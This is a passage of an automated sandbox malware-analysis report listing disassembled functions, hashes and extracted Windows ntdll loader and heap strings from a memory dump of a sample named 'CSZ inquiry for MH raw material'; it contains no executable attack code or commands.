                                                • Instruction Fuzzy Hash: 6DB18C729083529FD711DF68C490A6FBBE8BB88754F05492FFA89DB320D730D9058B92
                                                Function 015B0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                • API String ID: 0-1357697941
                                                • Opcode ID: f420bb705d61e01e3f5620158f4fd90be25f91a9f2626caadbe68a6078b9ed91
                                                • Instruction ID: e40952e83463853036842c42589e6ee111b2795e4bc3200c29373359b5d1b53f
                                                • Opcode Fuzzy Hash: f420bb705d61e01e3f5620158f4fd90be25f91a9f2626caadbe68a6078b9ed91
                                                • Instruction Fuzzy Hash: D0F1BC31A00A86EFDB25CF69C0D0BEABBF5FF19704F18845EE6859B291C730A945CB50
                                                Function 015B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: 3655efa1731eb22421dc53349bbefecdf8f84353cf756584573b64f44af82c15
                                                • Instruction ID: 61c3df4d84246ebc0fd50b72853e045421c8fd8df76cc09efebc49c32c1cf0b7
                                                • Opcode Fuzzy Hash: 3655efa1731eb22421dc53349bbefecdf8f84353cf756584573b64f44af82c15
                                                • Instruction Fuzzy Hash: BED1CB31500686DFDB22DF69C490AEEBBF1FF5A600F18805EE9459F6A2C7349985CB10
                                                Function 015889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                Download Yara Rule
                                                Strings
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01588A67
                                                • VerifierDlls, xrefs: 01588CBD
                                                • HandleTraces, xrefs: 01588C8F
                                                • VerifierDebug, xrefs: 01588CA5
                                                • VerifierFlags, xrefs: 01588C50
                                                • AVRF: -*- final list of providers -*- , xrefs: 01588B8F
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01588A3D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 46f5aee71586dc31585ddca6110dfc5a50155c44c411d21615aa427f9bd4e3bd
                                                • Instruction ID: 84f7f71f89395dd8fdb39f3eb4f4b9ce7783dfbd28e977e3cb5d125bbae6bcf4
                                                • Opcode Fuzzy Hash: 46f5aee71586dc31585ddca6110dfc5a50155c44c411d21615aa427f9bd4e3bd
                                                • Instruction Fuzzy Hash: 18911371641702AFD722FF68C880B2A7BE4FB94714F86095DFA40BF291D770A805CBA1
                                                Function 0150EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                • API String ID: 0-1109411897
                                                • Opcode ID: 3e5d50b9d80dbb6f024e6276a57fc8259006773873d19ed748d863413b99b51d
                                                • Instruction ID: 005aee9baed47bbd310e7ff442939c8f52c1800b82a037ecc82da0039b50f0c1
                                                • Opcode Fuzzy Hash: 3e5d50b9d80dbb6f024e6276a57fc8259006773873d19ed748d863413b99b51d
                                                • Instruction Fuzzy Hash: E4A23974A0562A8FDB75CF58C9887ADBBB5BF45304F2446EAD509AB290DB309EC1CF40
                                                Function 014FF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: f7b917c2b86171c9748785edd87609854423ac4d49fd93307fb2dd10a117a4dc
                                                • Instruction ID: 964e6b07813d8c30f70e8ffca6ce979bfeb15c20a032843e411ef7018cd74bc6
                                                • Opcode Fuzzy Hash: f7b917c2b86171c9748785edd87609854423ac4d49fd93307fb2dd10a117a4dc
                                                • Instruction Fuzzy Hash: 4E4201362043828FD715CF28C894B6ABBE5FF94604F14496EFA95CB362D730D94ACB52
                                                Function 0150ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                • API String ID: 0-4098886588
                                                • Opcode ID: cb66fcf27792a1150dee14ca7ffe569542897f5368f812c815befc599f804829
                                                • Instruction ID: 302e21b79b6da4512a7bedc0b88f5d5636da8c343a49855e6477305366024f0a
                                                • Opcode Fuzzy Hash: cb66fcf27792a1150dee14ca7ffe569542897f5368f812c815befc599f804829
                                                • Instruction Fuzzy Hash: 1C32A27490426A8BDB23CF58C898BEEBBB9BF44340F1445E9D849AF291D7319E81CF40
                                                Function 0151B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                • Opcode ID: a7acf920a669fff87a946627bf9f57a8e99e5484c3f25aaa2c27f6edbdd5c076
                                                • Instruction ID: 9bbe3ca03db6f2d3987f730618df6a9e231220eafc125ac24108e1cc1766270c
                                                • Opcode Fuzzy Hash: a7acf920a669fff87a946627bf9f57a8e99e5484c3f25aaa2c27f6edbdd5c076
                                                • Instruction Fuzzy Hash: 58C14931A00316ABFB269B68C891BBEBBB5BF85304F148169ED129F299D774CD44C391
                                                Function 015363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 8add9c685cab64a42c6a99e642dda75489cb59d6293359530da28c1991219dcc
                                                • Instruction ID: 27800e2b49461279e59a437f1685039fb5eaf628e0217217496d8f89e224a3aa
                                                • Opcode Fuzzy Hash: 8add9c685cab64a42c6a99e642dda75489cb59d6293359530da28c1991219dcc
                                                • Instruction Fuzzy Hash: CB914B70F01316ABEB35EF58E88ABAE7BE1BF80714F15012DE510AF291D7B09941C791
                                                Function 014F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                Download Yara Rule
                                                Strings
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01559A2A
                                                • apphelp.dll, xrefs: 014F6496
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015599ED
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01559A01
                                                • LdrpInitShimEngine, xrefs: 015599F4, 01559A07, 01559A30
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01559A11, 01559A3A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: 0aa54e95f8aaafb5f6bcde27bbb6094304beb8e85bd86306e07c2ebd7922d66b
                                                • Instruction ID: 4b2bdde7a45512a68fe3be8302ddd6b711a021de2d50b51910fba488a96952e9
                                                • Opcode Fuzzy Hash: 0aa54e95f8aaafb5f6bcde27bbb6094304beb8e85bd86306e07c2ebd7922d66b
                                                • Instruction Fuzzy Hash: 6C519E71218305DFE721EF24D855FAB77E8FB84648F11091EEA959B260D7B0E904CBA2
                                                Function 01532674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0157219F
                                                • SXS: %s() passed the empty activation context, xrefs: 01572165
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01572180
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015721BF
                                                • RtlGetAssemblyStorageRoot, xrefs: 01572160, 0157219A, 015721BA
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01572178
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: c244b6bcd6fc750bc0c8d2a100b03efa9257079d3da081bcd774785f0d3550ce
                                                • Instruction ID: ca6dce90dd1475c541de19ce48337a7a64be992c3ec1b10a914a6d216306406e
                                                • Opcode Fuzzy Hash: c244b6bcd6fc750bc0c8d2a100b03efa9257079d3da081bcd774785f0d3550ce
                                                • Instruction Fuzzy Hash: EF310936B4021577E7229A99AC46F5E7BB8FFE4AA1F05005ABB04BF150D2709A00C7E0
                                                Function 0153C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 015781E5
                                                • LdrpInitializeImportRedirection, xrefs: 01578177, 015781EB
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01578181, 015781F5
                                                • Loading import redirection DLL: '%wZ', xrefs: 01578170
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0153C6C3
                                                • LdrpInitializeProcess, xrefs: 0153C6C4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: 06508298311ac55e7195ec9c5193b5a9f9ef679efbe7339b7029fced058496b0
                                                • Instruction ID: 57554c16196d48988585acae677431462f2d54d684e2dc2ff224753b2cbca778
                                                • Opcode Fuzzy Hash: 06508298311ac55e7195ec9c5193b5a9f9ef679efbe7339b7029fced058496b0
                                                • Instruction Fuzzy Hash: 0A3104726443139BD214EF28E84AE2A77E4FFD4B14F05095DF940AF2A1DA70ED04C7A2
                                                Function 01519950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                • API String ID: 0-3393094623
                                                • Opcode ID: e8cb9dd3a7cb4461d23a739a09ee5a614d609a93e74e8bd0c410f070070a3331
                                                • Instruction ID: 754060c09d843a7cb321b1573851e20d45ed6690894ae0611a91f9bccb99cbf4
                                                • Opcode Fuzzy Hash: e8cb9dd3a7cb4461d23a739a09ee5a614d609a93e74e8bd0c410f070070a3331
                                                • Instruction Fuzzy Hash: 62025D755083828FE722CF28C09476FBBE5BF88718F44491EE9998F254E774D844CB92
                                                Function 0154096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 01542DF0: LdrInitializeThunk.NTDLL ref: 01542DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540D74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                • Opcode ID: f9fa9a1ab4617b56dd6b71d514a6b1f574c8d8162e3f9696162a3dc88ce8257f
                                                • Instruction ID: 44e80c05ed852cf6e6ba7535a32fdd83300c80749c2894b42edd4354270d2e52
                                                • Opcode Fuzzy Hash: f9fa9a1ab4617b56dd6b71d514a6b1f574c8d8162e3f9696162a3dc88ce8257f
                                                • Instruction Fuzzy Hash: 42426B75900716DFDB21CF28C881BEAB7F4BF44318F1445A9EA89DB241E770AA84CF61
                                                Function 01584F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                • API String ID: 0-2518169356
                                                • Opcode ID: 22e5f303ebef62d3ed7744a7eedc4272b78ce434c49a383944f945e589ef9799
                                                • Instruction ID: 1556843b71e866998f44b0ea26b489fbde6a41a6d04967ddb66df2e741ed6be1
                                                • Opcode Fuzzy Hash: 22e5f303ebef62d3ed7744a7eedc4272b78ce434c49a383944f945e589ef9799
                                                • Instruction Fuzzy Hash: 8C91AD76A1061ADBCB21DF9CC880AAEBBB1FF88314F594169E951FB350E735D901CB90
                                                Function 015170C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 5a1e81480659920f017741e6fa9e912e05d8414d4ab367b8684a67c6ee98d1e1
                                                • Instruction ID: 0bfa05adc6d87ff6fa6513b643ee8ba5239e6fa6bbc6795cc1a365236decf584
                                                • Opcode Fuzzy Hash: 5a1e81480659920f017741e6fa9e912e05d8414d4ab367b8684a67c6ee98d1e1
                                                • Instruction Fuzzy Hash: 9B13BC70A006169FEB26CF6CC4807ADBBF1FF48304F1885A9D959AF389D774A945CB90
                                                Function 0151A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                Download Yara Rule
                                                Strings
                                                • SsHd, xrefs: 0151A885
                                                • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01567D03
                                                • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01567D56
                                                • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01567D39
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                • API String ID: 0-2905229100
                                                • Opcode ID: 32a9a645dda908e83fd28cbf568ed00574d8139e330538309ceb06bd1c90d5b0
                                                • Instruction ID: 440b8dea1433a838e322b898c0249c499dba1c002e78f4db6d7fe613e5abf0c7
                                                • Opcode Fuzzy Hash: 32a9a645dda908e83fd28cbf568ed00574d8139e330538309ceb06bd1c90d5b0
                                                • Instruction Fuzzy Hash: 4FD1B276A01255DFEB26CF98C8C0AADBBF6FF58314F19405AE905AF349D3719881CB90
                                                Function 0150A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: 06329e5a46050cbd64d04271d3cd71499494fa52c995ffbfb29da83a5db4bb0b
                                                • Instruction ID: e53d7c7847037c1b250b459cc6956af4e26268482d35d6757f3871feadcc663e
                                                • Opcode Fuzzy Hash: 06329e5a46050cbd64d04271d3cd71499494fa52c995ffbfb29da83a5db4bb0b
                                                • Instruction Fuzzy Hash: 0CC17B75508382CFDB22CFA8C140B6AB7E4FF84704F04896AF9958F291E775C949CB92
                                                Function 01538402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0153855E
                                                • @, xrefs: 01538591
                                                • LdrpInitializeProcess, xrefs: 01538422
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01538421
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: 8447dc96470108a94d74631cd6bb4e015883918b98d61a37c71880ab405a0c8b
                                                • Instruction ID: 5e4717c7392627a718692ca41b91cb7c67d12374a2ff2bf88b17002a1e1d3eea
                                                • Opcode Fuzzy Hash: 8447dc96470108a94d74631cd6bb4e015883918b98d61a37c71880ab405a0c8b
                                                • Instruction Fuzzy Hash: FE919C71558346AFE722DE65DC41EABBBE8BFC4744F400A2EFA849B150E334D904CB62
                                                Function 01510C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                Download Yara Rule
                                                Strings
                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 015654ED
                                                • HEAP[%wZ]: , xrefs: 015654D1, 01565592
                                                • HEAP: , xrefs: 015654E0, 015655A1
                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 015655AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                • API String ID: 0-1657114761
                                                • Opcode ID: f7ce57c44ae0946b159ff6e0c5670ca7242e1879352b6cb11b2f0c35a3a96f17
                                                • Instruction ID: 397b31073b6f236d95d7883f68743ba9f39332e070a786ec379c564897f7358c
                                                • Opcode Fuzzy Hash: f7ce57c44ae0946b159ff6e0c5670ca7242e1879352b6cb11b2f0c35a3a96f17
                                                • Instruction Fuzzy Hash: 01A1BF306006069FE726CF29C480BBABBF1BF55304F54856EE5968F68AD734E984CB91
                                                Function 0153273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015721D9, 015722B1
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015722B6
                                                • SXS: %s() passed the empty activation context, xrefs: 015721DE
                                                • .Local, xrefs: 015328D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: f42866a8a36e059cd6b0b20bb70031e411c4e030eaa3dcfaee2cebe60bb1a39d
                                                • Instruction ID: 7e8958a033a2a0e106669c66b58283eaccf2b74ebae5ebbd8b59b0b235c39505
                                                • Opcode Fuzzy Hash: f42866a8a36e059cd6b0b20bb70031e411c4e030eaa3dcfaee2cebe60bb1a39d
                                                • Instruction Fuzzy Hash: EDA1B13690022ADBDB25CF69D884BA9B7B1BF98354F1445EAD908AF251D7309EC1CF90
                                                Function 01534AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0157342A
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01573456
                                                • RtlDeactivateActivationContext, xrefs: 01573425, 01573432, 01573451
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01573437
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                • Opcode ID: 47a2fb4f58691e59d30adaeb58d2e770ea20b4eeeb51cc8b53e0a86e0fd898b6
                                                • Instruction ID: d5677ed13b0250eb6582529f5cc5360b22f4de8e0a7dcb3625d5efd0de2fc185
                                                • Opcode Fuzzy Hash: 47a2fb4f58691e59d30adaeb58d2e770ea20b4eeeb51cc8b53e0a86e0fd898b6
                                                • Instruction Fuzzy Hash: 8A6101366407129BD72ACF1DD85AB2AB7E6FFC0B60F14852DE8959F241DB30E801CB91
                                                Function 015064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                Download Yara Rule
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0156106B
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01561028
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01560FE5
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015610AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: 90cb5a36be4ff081e7078d5e14ed0a204b6c159d2876ed417752f67b763ddd25
